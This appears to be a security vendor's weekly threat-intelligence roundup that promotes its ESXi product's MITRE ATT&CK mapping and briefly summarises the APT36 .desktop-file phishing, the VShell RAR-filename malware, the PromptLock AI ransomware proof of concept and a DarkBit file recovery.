In this week’s roundup, we highlight Vali Cyber’s addition to the Tidal Cyber Registry, giving security teams MITRE ATT&CK mapping for ESXi defenses. We also cover APT36’s stealthy Linux campaign using PDF-disguised .desktop files, a newly discovered RAR-based malware chain deploying the VShell backdoor, the PromptLock PoC showing how AI can be weaponized for cross-platform ransomware, and Profero’s deep dive into recovering files from a DarkBit attack on ESXi. Read on!
Vali Cyber® Joins the Tidal Cyber Registry: Mapping ZeroLock® to MITRE ATT&CK for ESXi
Vali Cyber has officially joined the Tidal Cyber Registry! ZeroLock maps directly to MITRE ATT&CK for ESXi, giving security teams clear visibility into hypervisor-layer defenses, closing blind spots, and strengthening protection against ransomware at one of the most targeted layers of infrastructure.
"I'm grateful to the Tidal Cyber team for the chance to work alongside them on this! Bringing ZeroLock into Tidal’s Threat-Led Defense will help teams validate controls against real behaviors and protect virtualized environments with confidence."
On Vali Cyber® Joins the Tidal Cyber Registry: Mapping ZeroLock® to MITRE ATT&CK for ESXi
"ESET’s discovery of PromptLock shows that while the mechanics of ransomware—stealing, encrypting, and ransoming data—remain unchanged, the delivery is evolving. By using a local LLM to generate attack scripts on the fly, it strips away the API visibility defenders often rely on, making detection harder. The real shift isn’t in ransomware’s goals, but in how AI is lowering the barrier to innovation for attackers, accelerating an old threat with new tools."
On PromptLock: First AI-Powered Ransomware Emerges
"Phishing campaigns and other forms of end-user trickery remain some of the most popular methods of gaining initial access for motivated attackers. APT36 shows that this is true not only for ransomware gangs and less organized groups, but also for nation-state level threats. Using "known good" payload delivery methods like Google Drive make this an even sneakier and more difficult to detect attack."
On Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery
Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery
APT36 is running a stealthy Linux campaign using phishing ZIPs with PDF-disguised .desktop files to target defense entities, delivering payloads via Google Drive and evading detection through icon spoofing and in-memory execution.
Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection
A newly uncovered Linux malware campaign uses phishing emails with RAR archive attachments whose filenames embed Base64-encoded shell commands—bypassing antivirus detection and triggering in-memory execution of the VShell backdoor.
PromptLock, the first proof-of-concept AI-powered ransomware, leverages an open-weight LLM to generate Lua scripts for data theft and encryption across Windows and Linux, showing how AI can be weaponized in ransomware to usher in a new frontier of cyber threats.
From Drone Strike to File Recovery: Outsmarting a Nation State
Different from our usual coverage, but too good not to include! This blog details how Profero’s IR team unraveled a DarkBit ransomware attack on ESXi servers, exploiting flawed encryption and brute-forcing weak AES keys to recover critical files despite the attackers’ silence.
-2.png?upscale=true&width=1120&upscale=true&name=Copy%20of%20WTR%20Newsletter%20Email%20Header%20(2)-2.png)
